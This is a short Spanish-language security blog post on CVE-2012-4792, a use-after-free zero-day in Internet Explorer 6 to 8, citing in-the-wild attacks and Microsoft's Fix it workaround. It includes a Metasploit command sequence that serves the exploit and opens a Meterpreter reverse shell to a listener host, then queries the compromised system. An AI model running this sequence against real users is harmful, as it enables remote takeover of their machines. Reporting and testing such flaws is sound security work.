Ejecución de código arbitrario en Microsoft Internet Explorer 6, 7 y 8 (0 day user-after-free)

Hace unos días salía a la palestra de nuevo Microsoft Internet Explorer, a lo cual dicho sea de paso nos tiene más que aconstumbrados...

La razón es que Microsoft ha confirmado una vulnerabilidad de día 0 que afecta al navegador Internet Explorer 6, 7 y 8 (las versiones 9 y 10 no se ven afectadas).

El problema, al que se la que se le ha asignado el CVE-2012-4792, reside en que se accede a un objeto en la memoria que se ha eliminado o que se ha asignado incorrectamente (use-after-free) lo cual permite la ejecución de código arbitrario con los privilegios que tenga el usuario. Esta vulnerabilidad además puede permitir la elevación de privilegios y el compromiso de la totalidad del sistema.

Se han detectado ataques que explotan esta vulnerabilidad, como es el caso de la web http://www.cfr.org/ comprometida esta semana y, hasta el momento, Microsoft sólo aporta una solución rápida (“solución Fix it”) hasta la publicación del correspondiente parche en el boletín de actualizaciones: http://support.microsoft.com/kb/2794220.

También se ha publicado un exploit en el framework Metasploit. Os adjunto los comandos y un ejemplo gráfico de su ejecución:
use exploit/windows/browser/ie_cbutton_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid


Bueno y para el que se sienta juguetón:
 

Comentarios